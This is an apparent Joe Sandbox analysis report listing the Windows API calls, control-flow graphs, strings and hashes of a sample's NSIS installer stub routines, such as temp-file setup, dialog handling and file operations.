                                                        • Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                        • Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                        • Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      • SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC
                                                        • Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016
                                                      • GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
                                                      • GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
                                                      • CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
                                                      • GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
                                                      • GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
                                                      • lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
                                                      • DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
                                                      • CoUninitialize.COMBASE(?), ref: 00403AD1
                                                      • ExitProcess.KERNEL32 ref: 00403AF1
                                                      • lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
                                                      • lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
                                                      • CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
                                                      • SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
                                                      • DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
                                                      • CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
                                                      • CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp$1C
                                                      • API String ID: 2435955865-239407132
                                                      • Opcode ID: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                      • Instruction ID: 7cf1fa831aca86d96b8495533088dbe4cf0b0326274ef0a42366eb07f7c747b9
                                                      • Opcode Fuzzy Hash: b4c90e19bc4a522d6528af1b5983b0f211df9e73c6af6eb8e5ff34ebe7c06cb6
                                                      • Instruction Fuzzy Hash: C4A1B671544305BAD6207F629D4AF1B3EACAF0070AF15483FF585B61D2DBBC8A448B6E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 820 4074bb-4074c0 821 4074c2-4074ef 820->821 822 40752f-407547 820->822 824 4074f1-4074f4 821->824 825 4074f6-4074fa 821->825 823 407aeb-407aff 822->823 829 407b01-407b17 823->829 830 407b19-407b2c 823->830 826 407506-407509 824->826 827 407502 825->827 828 4074fc-407500 825->828 831 407527-40752a 826->831 832 40750b-407514 826->832 827->826 828->826 833 407b33-407b3a 829->833 830->833 836 4076f6-407713 831->836 837 407516 832->837 838 407519-407525 832->838 834 407b61-407c68 833->834 835 407b3c-407b40 833->835 851 407350 834->851 852 407cec 834->852 840 407b46-407b5e 835->840 841 407ccd-407cd4 835->841 843 407715-407729 836->843 844 40772b-40773e 836->844 837->838 839 407589-4075b6 838->839 847 4075d2-4075ec 839->847 848 4075b8-4075d0 839->848 840->834 845 407cdd-407cea 841->845 849 407741-40774b 843->849 844->849 850 407cef-407cf6 845->850 853 4075f0-4075fa 847->853 848->853 854 40774d 849->854 855 4076ee-4076f4 849->855 856 407357-40735b 851->856 857 40749b-4074b6 851->857 858 40746d-407471 851->858 859 4073ff-407403 851->859 852->850 862 407600 853->862 863 407571-407577 853->863 864 407845-4078a1 854->864 865 4076c9-4076cd 854->865 855->836 861 407692-40769c 855->861 856->845 866 407361-40736e 856->866 857->823 871 407c76-407c7d 858->871 872 407477-40748b 858->872 877 407409-407420 859->877 878 407c6d-407c74 859->878 867 4076a2-4076c4 861->867 868 407c9a-407ca1 861->868 880 407556-40756e 862->880 881 407c7f-407c86 862->881 869 40762a-407630 863->869 870 40757d-407583 863->870 864->823 873 407c91-407c98 865->873 874 4076d3-4076eb 865->874 866->852 882 407374-4073ba 866->882 867->864 868->845 883 40768e 869->883 884 407632-40764f 869->884 870->839 870->883 871->845 879 40748e-407496 872->879 873->845 874->855 885 407423-407427 877->885 878->845 879->858 889 407498 879->889 880->863 881->845 887 4073e2-4073e4 882->887 888 4073bc-4073c0 882->888 883->861 890 407651-407665 884->890 891 407667-40767a 884->891 885->859 886 407429-40742f 885->886 893 407431-407438 886->893 894 407459-40746b 886->894 897 4073f5-4073fd 887->897 898 4073e6-4073f3 887->898 895 4073c2-4073c5 GlobalFree 888->895 896 4073cb-4073d9 GlobalAlloc 888->896 889->857 892 40767d-407687 890->892 891->892 892->869 899 407689 892->899 900 407443-407453 GlobalAlloc 893->900 901 40743a-40743d GlobalFree 893->901 894->879 895->896 896->852 902 4073df 896->902 897->885 898->897 898->898 904 407c88-407c8f 899->904 905 40760f-407627 899->905 900->852 900->894 901->900 902->887 904->845 905->869
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                      • Instruction ID: b44593247c4c050b0e646bb53675e7b1a8962b0b92449cff70e8ee1879f4dc4f
                                                      • Opcode Fuzzy Hash: 40903ab5852a4d5be4c36b37cb9ac035c10bc9e934730a02f9966fb4d26bd2b9
                                                      • Instruction Fuzzy Hash: 00F14871908249DBDF18CF28C8946E93BB1FF44345F14852AFD5A9B281D338E986DF86
                                                      APIs
                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406327
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: AddressHandleLibraryLoadModuleProc
                                                      • String ID:
                                                      • API String ID: 310444273-0
                                                      • Opcode ID: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                      • Instruction ID: 23f85fcbdf3119ad7ff9d94b99dcad510d7c567b01d836bd9cab37df641e0753
                                                      • Opcode Fuzzy Hash: a32725a6e723fbcd4130456278775f3bec070c67c36dcd31cef0056e0dec9b78
                                                      • Instruction Fuzzy Hash: 53D0123120010597C6001B65AE0895F776CEF95611707803EF542F3132EB34D415AAEC
                                                      APIs
                                                      • FindFirstFileW.KERNELBASE(004572C0,0045BEC8,004572C0,004067CE,004572C0), ref: 004062E0
                                                      • FindClose.KERNEL32(00000000), ref: 004062EC
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Find$CloseFileFirst
                                                      • String ID:
                                                      • API String ID: 2295610775-0
                                                      • Opcode ID: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                      • Instruction ID: 3dd5e1b78c12f0f437ff376ab6b0e1f90f8becb0d3509d6a9a7f52ed6ae53baf
                                                      • Opcode Fuzzy Hash: c6f116a51c08f79c55c0589ec24d04b7eaebe21ecc1702d782a9edd0eda53026
                                                      • Instruction Fuzzy Hash: 7AD0C9315041205BC25127386E0889B6A589F163723258A7AB5A6E11E0CB388C2296A8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 56 405479-40548b 57 405491-405497 56->57 58 4055cd-4055dc 56->58 57->58 59 40549d-4054a6 57->59 60 40562b-405640 58->60 61 4055de-405626 GetDlgItem * 2 call 403d3f SetClassLongW call 40141d 58->61 62 4054a8-4054b5 SetWindowPos 59->62 63 4054bb-4054be 59->63 65 405680-405685 call 403daf 60->65 66 405642-405645 60->66 61->60 62->63 68 4054c0-4054d2 ShowWindow 63->68 69 4054d8-4054de 63->69 74 40568a-4056a5 65->74 71 405647-405652 call 40139d 66->71 72 405678-40567a 66->72 68->69 75 4054e0-4054f5 DestroyWindow 69->75 76 4054fa-4054fd 69->76 71->72 93 405654-405673 SendMessageW 71->93 72->65 73 405920 72->73 81 405922-405929 73->81 79 4056a7-4056a9 call 40141d 74->79 80 4056ae-4056b4 74->80 82 4058fd-405903 75->82 84 405510-405516 76->84 85 4054ff-40550b SetWindowLongW 76->85 79->80 89 4056ba-4056c5 80->89 90 4058de-4058f7 DestroyWindow KiUserCallbackDispatcher 80->90 82->73 87 405905-40590b 82->87 91 4055b9-4055c8 call 403dca 84->91 92 40551c-40552d GetDlgItem 84->92 85->81 87->73 95 40590d-405916 ShowWindow 87->95 89->90 96 4056cb-405718 call 406805 call 403d3f * 3 GetDlgItem 89->96 90->82 91->81 97 40554c-40554f 92->97 98 40552f-405546 SendMessageW IsWindowEnabled 92->98 93->81 95->73 126 405723-40575f ShowWindow KiUserCallbackDispatcher call 403d85 EnableWindow 96->126 127 40571a-405720 96->127 101 405551-405552 97->101 102 405554-405557 97->102 98->73 98->97 103 405582-405587 call 403d18 101->103 104 405565-40556a 102->104 105 405559-40555f 102->105 103->91 107 4055a0-4055b3 SendMessageW 104->107 109 40556c-405572 104->109 105->107 108 405561-405563 105->108 107->91 108->103 112 405574-40557a call 40141d 109->112 113 405589-405592 call 40141d 109->113 122 405580 112->122 113->91 123 405594-40559e 113->123 122->103 123->122 130 405761-405762 126->130 131 405764 126->131 127->126 132 405766-405794 GetSystemMenu EnableMenuItem SendMessageW 130->132 131->132 133 405796-4057a7 SendMessageW 132->133 134 4057a9 132->134 135 4057af-4057ed call 403d98 call 406009 lstrlenW call 406805 SetWindowTextW call 40139d 133->135 134->135 135->74 144 4057f3-4057f5 135->144 144->74 145 4057fb-4057ff 144->145 146 405801-405807 145->146 147 40581e-405832 DestroyWindow 145->147 146->73 148 40580d-405813 146->148 147->82 149 405838-405865 CreateDialogParamW 147->149 148->74 150 405819 148->150 149->82 151 40586b-4058c2 call 403d3f GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 40139d 149->151 150->73 151->73 156 4058c4-4058d7 ShowWindow call 403daf 151->156 158 4058dc 156->158 158->82
                                                      APIs
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 004054B5
                                                      • ShowWindow.USER32(?), ref: 004054D2
                                                      • DestroyWindow.USER32 ref: 004054E6
                                                      • SetWindowLongW.USER32(?,00000000,00000000), ref: 00405502
                                                      • GetDlgItem.USER32(?,?), ref: 00405523
                                                      • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00405537
                                                      • IsWindowEnabled.USER32(00000000), ref: 0040553E
                                                      • GetDlgItem.USER32(?,00000001), ref: 004055ED
                                                      • GetDlgItem.USER32(?,00000002), ref: 004055F7
                                                      • SetClassLongW.USER32(?,000000F2,?), ref: 00405611
                                                      • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00405662
                                                      • GetDlgItem.USER32(?,00000003), ref: 00405708
                                                      • ShowWindow.USER32(00000000,?), ref: 0040572A
                                                      • KiUserCallbackDispatcher.NTDLL(?,?), ref: 0040573C
                                                      • EnableWindow.USER32(?,?), ref: 00405757
                                                      • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040576D
                                                      • EnableMenuItem.USER32(00000000), ref: 00405774
                                                      • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 0040578C
                                                      • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040579F
                                                      • lstrlenW.KERNEL32(00447240,?,00447240,0046ADC0), ref: 004057C8
                                                      • SetWindowTextW.USER32(?,00447240), ref: 004057DC
                                                      • ShowWindow.USER32(?,0000000A), ref: 00405910
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                      • String ID: @rD
                                                      • API String ID: 3282139019-3814967855
                                                      • Opcode ID: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                      • Instruction ID: 0f9b988f21b44e482dc064b3562f20aa73efc2902ac8c6ffeb9ddf27563d0ddb
                                                      • Opcode Fuzzy Hash: 892c705fd8619986465a6960d4e81f7d1e8168c1c52714a2b5abc7a1d7472251
                                                      • Instruction Fuzzy Hash: D8C1C371500A04EBDB216F61EE49E2B3BA9EB45345F00093EF551B12F0DB799891EF2E

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 159 4015a0-4015f4 160 4030e3-4030ec 159->160 161 4015fa 159->161 185 4030ee-4030f2 160->185 163 401601-401611 call 4062a3 161->163 164 401742-40174f 161->164 165 401962-40197d call 40145c GetFullPathNameW 161->165 166 4019ca-4019e6 call 40145c SearchPathW 161->166 167 40176e-401794 call 40145c call 4062a3 SetFileAttributesW 161->167 168 401650-40166d call 40137e call 4062a3 call 40139d 161->168 169 4017b1-4017d8 call 40145c call 4062a3 call 405d59 161->169 170 401672-401686 call 40145c call 4062a3 161->170 171 401693-4016ac call 401446 call 4062a3 161->171 172 401715-401731 161->172 173 401616-40162d call 40145c call 4062a3 call 404f72 161->173 174 4016d6-4016db 161->174 175 401736-4030de 161->175 176 401897-4018a7 call 40145c call 4062d5 161->176 177 4018db-401910 call 40145c * 3 call 4062a3 MoveFileW 161->177 178 40163c-401645 161->178 179 4016bd-4016d1 call 4062a3 SetForegroundWindow 161->179 163->185 189 401751-401755 ShowWindow 164->189 190 401758-40175f 164->190 224 4019a3-4019a8 165->224 225 40197f-401984 165->225 166->160 217 4019ec-4019f8 166->217 167->160 242 40179a-4017a6 call 4062a3 167->242 168->185 264 401864-40186c 169->264 265 4017de-4017fc call 405d06 CreateDirectoryW 169->265 243 401689-40168e call 404f72 170->243 248 4016b1-4016b8 Sleep 171->248 249 4016ae-4016b0 171->249 172->185 186 401632-401637 173->186 183 401702-401710 174->183 184 4016dd-4016fd call 401446 174->184 175->160 219 4030de call 405f51 175->219 244 4018c2-4018d6 call 4062a3 176->244 245 4018a9-4018bd call 4062a3 176->245 272 401912-401919 177->272 273 40191e-401921 177->273 178->186 187 401647-40164e PostQuitMessage 178->187 179->160 183->160 184->160 186->185 187->186 189->190 190->160 208 401765-401769 ShowWindow 190->208 208->160 217->160 219->160 228 4019af-4019b2 224->228 225->228 235 401986-401989 225->235 228->160 238 4019b8-4019c5 GetShortPathNameW 228->238 235->228 246 40198b-401993 call 4062d5 235->246 238->160 259 4017ab-4017ac 242->259 243->160 244->185 245->185 246->224 269 401995-4019a1 call 406009 246->269 248->160 249->248 259->160 267 401890-401892 264->267 268 40186e-40188b call 404f72 call 406009 SetCurrentDirectoryW 264->268 277 401846-40184e call 4062a3 265->277 278 4017fe-401809 GetLastError 265->278 267->243 268->160 269->228 272->243 279 401923-40192b call 4062d5 273->279 280 40194a-401950 273->280 292 401853-401854 277->292 283 401827-401832 GetFileAttributesW 278->283 284 40180b-401825 GetLastError call 4062a3 278->284 279->280 298 40192d-401948 call 406c68 call 404f72 279->298 288 401957-40195d call 4062a3 280->288 290 401834-401844 call 4062a3 283->290 291 401855-40185e 283->291 284->291 288->259 290->292 291->264 291->265 292->291 298->288
                                                      APIs
                                                      • PostQuitMessage.USER32(00000000), ref: 00401648
                                                      • Sleep.KERNELBASE(00000000,?,00000000,00000000,00000000), ref: 004016B2
                                                      • SetForegroundWindow.USER32(?), ref: 004016CB
                                                      • ShowWindow.USER32(?), ref: 00401753
                                                      • ShowWindow.USER32(?), ref: 00401767
                                                      • SetFileAttributesW.KERNEL32(00000000,00000000,?,000000F0), ref: 0040178C
                                                      • CreateDirectoryW.KERNELBASE(?,00000000,00000000,0000005C,?,?,?,000000F0,?,000000F0), ref: 004017F4
                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 004017FE
                                                      • GetLastError.KERNEL32(?,?,000000F0,?,000000F0), ref: 0040180B
                                                      • GetFileAttributesW.KERNELBASE(?,?,?,000000F0,?,000000F0), ref: 0040182A
                                                      • SetCurrentDirectoryW.KERNELBASE(?,004CB0B0,?,000000E6,0040F0D0,?,?,?,000000F0,?,000000F0), ref: 00401885
                                                      • MoveFileW.KERNEL32(00000000,?), ref: 00401908
                                                      • GetFullPathNameW.KERNEL32(00000000,00002004,00000000,?,00000000,000000E3,0040F0D0,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 00401975
                                                      • GetShortPathNameW.KERNEL32(00000000,00000000,00002004), ref: 004019BF
                                                      • SearchPathW.KERNELBASE(00000000,00000000,00000000,00002004,00000000,?,000000FF,?,00000000,00000000,?,?,?,?,?,000000F0), ref: 004019DE
                                                      Strings
                                                      • CreateDirectory: can't create "%s" - a file already exists, xrefs: 00401837
                                                      • SetFileAttributes: "%s":%08X, xrefs: 0040177B
                                                      • detailprint: %s, xrefs: 00401679
                                                      • Jump: %d, xrefs: 00401602
                                                      • Call: %d, xrefs: 0040165A
                                                      • Rename failed: %s, xrefs: 0040194B
                                                      • Rename on reboot: %s, xrefs: 00401943
                                                      • IfFileExists: file "%s" exists, jumping %d, xrefs: 004018AD
                                                      • CreateDirectory: "%s" created, xrefs: 00401849
                                                      • SetFileAttributes failed., xrefs: 004017A1
                                                      • Sleep(%d), xrefs: 0040169D
                                                      • IfFileExists: file "%s" does not exist, jumping %d, xrefs: 004018C6
                                                      • CreateDirectory: "%s" (%d), xrefs: 004017BF
                                                      • BringToFront, xrefs: 004016BD
                                                      • Aborting: "%s", xrefs: 0040161D
                                                      • CreateDirectory: can't create "%s" (err=%d), xrefs: 00401815
                                                      • Rename: %s, xrefs: 004018F8
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1317975118.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.1317956249.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318000582.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318021031.00000000004B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004F9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.00000000004FB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000505000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1318147372.000000000050E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_PkContent.jbxd
                                                      Similarity
                                                      • API ID: FilePathWindow$AttributesDirectoryErrorLastNameShow$CreateCurrentForegroundFullMessageMovePostQuitSearchShortSleep
                                                      • String ID: Aborting: "%s"$BringToFront$Call: %d$CreateDirectory: "%s" (%d)$CreateDirectory: "%s" created$CreateDirectory: can't create "%s" (err=%d)$CreateDirectory: can't create "%s" - a file already exists$IfFileExists: file "%s" does not exist, jumping %d$IfFileExists: file "%s" exists, jumping %d$Jump: %d$Rename failed: %s$Rename on reboot: %s$Rename: %s$SetFileAttributes failed.$SetFileAttributes: "%s":%08X$Sleep(%d)$detailprint: %s
                                                      • API String ID: 2872004960-3619442763
                                                      • Opcode ID: e7226c198396c3fe3a7f3bea8c4d52a2e846d2bb9e79691e18455936b93e1c7d
